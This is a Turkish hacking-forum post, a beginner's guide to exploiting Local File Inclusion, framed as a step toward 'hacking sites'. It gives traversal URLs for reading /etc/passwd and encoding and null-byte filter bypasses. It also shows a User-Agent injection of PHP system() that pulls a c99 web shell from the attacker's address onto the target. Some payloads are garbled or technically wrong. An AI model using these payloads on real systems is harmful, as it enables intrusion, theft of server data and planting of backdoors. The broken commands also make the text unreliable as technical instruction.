Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Yeni Başlıyanlar için Özel Döküman
#1
İlk başta açıkları tanıyın daha sonra siteleri hackleyin.

1- Local File İnclude Nedir?

LFI (Local File İnclude) Yerel dosya çağırmak anlamına gelir.Bu açık şuanda bu o kadar güncel değildir.Ama bazı sitelerde nadir olarak görülebiliyor.Ben bu açıktan bahsetmeyecektim ama Web Güvenlik Açıkları denildiği zaman tüm WEB UYGULAMALARINI Kapsıyor.Bu sebep yüzünden bahsedeceğim.

2- Local File İnclude Mantığı Nedir?

LFI Açığının mantığı server üzerinde dosyaları okumaktır.Örnek olarak etc/passwd dosyasından bahsedeyim.Serverdaki tüm sitelerin USER’larının bulunduğu dosyadır.Bu açık sayesinde Serverdaki dosyaları okuma şansımız oluyor.

3- Saldırı Anı (Açığın Tespiti)

Bir Web Sayfası düşünün; http://www.site.com/sayfa.php?id=2 şeklinde olsun..Burada LFI Olup olmadığını şöyle anlayabiliriz;
http://www.site.com/sayfa.php?id= yaptığımızda sayfada eğer bir SQL İnjection hatası veya dosya bulunamadı şeklinde bir hata varsa orada LFI Olabilir.Peki Hata olarak nasıl bir hatadan bahsediyoruz?
Bize verilen hatadan yola çıkalım;

Warning: include() “/home/user/public_html/sayfa.php”

Şeklinde bir hata alıyorsak LFI Vardır diyebiliriz.

4- Saldırı Anı 2 (Açığın Kullanımı - Aksi Halde Bypass)


Ne demiştik.Sitemizde Warning: include() “/home/user/public_html/sayfa.php” şeklinde hata aldık.;
Açığı ../../etc/passwd şeklinde etc/password dosyasını okuyarak anlayabiliriz.Fakat burada ../../ dizin sayısı önemlidir.Hatada kaç adet dizin var bakalım;

/home/ -> 1
/user/ -> 2
/public_html/ -> 3
/sayfa.php -> 4

Evet 4 Adet dizin mevcuttur.Koyacağımız ../ işareti 4 adet olmalıdır;

http://www.site.com/sayfa.php?id=../../../../etc/passwd şeklinde...

-HTML Code

HTML kod çeviriciler mevcuttur internet üzerinde.Encode edeceğimiz komut;

Komut: ../../../../etc/passwd
Encode: ..%2F..%2F..%2F..%2Fetc%2Fpasswd

Tekrar deneyelim;

http://www.site.com/sayfa.php?id=..%2F.....c%2Fpasswd ve okumak istediğimiz /etc/passwd dosyasını okuduk;



- CharCode

CharCode Mozillanın Hackbar Eklentisinde Mevcuttur.Şimdi tekrardan bir bakalım
http://www.site.com/sayfa.php?id=../../../../etc/passwd şekline okumak istediğimizde tekrar okumuyor.HTML code encode şeklinde yaptık gene başarısız..Şimdi CharCode şeklinde yapacağız;

Komut: ../../../../etc/passwd
CharCode: String.fromCharCode(46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)

Evet dönüştürdük.Şimdi tekrar bakalım;

http://www.site.com/sayfa.php?id=String.fromCharCode(46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)


Şeklinde okuduk..Dosyamız başarılı bir şekilde okundu ;



- %00

Bu nedir diyeceksiniz.Çok basit bir yöntem aslında.Şimdi linkimizi tekrar göz önüne alalım;

http://www.site.com/sayfa.php?id=../../../../etc/passwd şeklinde okuyamadığımızı farz edelim; Satır sonuna %00 ekliyoruz bu işaret olaya netlik kazandırıyor;
http://www.site.com/sayfa.php?id=../../..../passwd%00 evet bu şekilde okumayı başardık



5- Saldırı Anı 3 (Açığı Kullanarak Siteye Dosya Yedirmek)

Açığın tespitinden bahsettik.Şimdi bu açığı kullanarak dosya dahil edeceğiz.Önce mozillanın tamper data eklentisini kurun.Daha Tamper Data yı açın.Start’a tıklayın ve http://www.site.com/sayfa.php?id=../../..../passwd%00 şeklinde sayfayı yenileyin.Önünüze gelen ilk uyarıya “TAMPER” Şeklinde cevap verin.Karşınıza;

This image has been resized.Click to view original image
This image has been resized.Click to view original image


Şeklinde bir panel gelecek.User-Agent Kısmındaki yazıları silin ve <? system(“cat http://www.site.com/c99.txt? -O c99.php “); ?> şeklinde Dosya adresinizi yazın.Yanlız dikkat edin yüklerken dosyayı .txt uzantılı olmasına dikkat edin..Yazdıktan sonra tamam diyoruz.Ve dosyamız dahil edilmiş oluyor;
http://www.site.com/c99.php şeklinde çagırabilirsiniz..

6- Local File İnclude Nerelerde Tespit Edilebilir?

a-) Search kutusu

Bir Search kutusu düşünün;


Buraya LFI Komutunu girip ara butonuna tıklayalım; ../../etc/passwd%00 şeklinde..
Eğer ekrana ;



Şeklinde komutumuz çalışırsa bu demek oluyor ki Search dosyasında LFI Açığı mevcuttur.
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:
#2
Klavyene sağlık exciting
Beğenenler:
#3
Eywallah kardeşim exciting
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WP Brute v2 Yeni Program ERTUĞRUL 39 929 Dün, Saat: 14:18
Son Yorum: Henkel
  Yeni Kolay Site Hack :) ByMuh4mm3d 200 5,414 Dün, Saat: 12:27
Son Yorum: 03yunus03
  Web Servisi Nedir ve Ne İçin Kullanılır CyberHacker 0 19 Dün, Saat: 00:35
Son Yorum: CyberHacker
  XSS Payloadları - Kodları - XSS Açıklı Siteler İçin CyberHacker 2 32 03-12-2016, Saat: 16:58
Son Yorum: CyberHacker
  Brute Force Arama Dorkları İçin En Çok Kullanılan Kelimeler !!! ( İngilizce ) TurKLoJeN 85 4,292 03-12-2016, Saat: 16:19
Son Yorum: ImRyMaTem
Anahtar Kelimeler

Yeni Başlıyanlar için Özel Döküman indir, Yeni Başlıyanlar için Özel Döküman Videosu, Yeni Başlıyanlar için Özel Döküman Online izle, Yeni Başlıyanlar için Özel Döküman Bedava indir, Yeni Başlıyanlar için Özel Döküman Yükle, Yeni Başlıyanlar için Özel Döküman Hakkında, Yeni Başlıyanlar için Özel Döküman Nedir, Yeni Başlıyanlar için Özel Döküman Free indir, Yeni Başlıyanlar için Özel Döküman Oyunu, Yeni Başlıyanlar için Özel Döküman Download


1 Ziyaretçi